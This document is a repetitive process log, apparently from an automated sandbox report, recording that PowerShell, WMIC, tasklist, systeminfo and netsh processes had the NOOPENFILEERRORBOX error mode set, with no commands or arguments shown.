Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
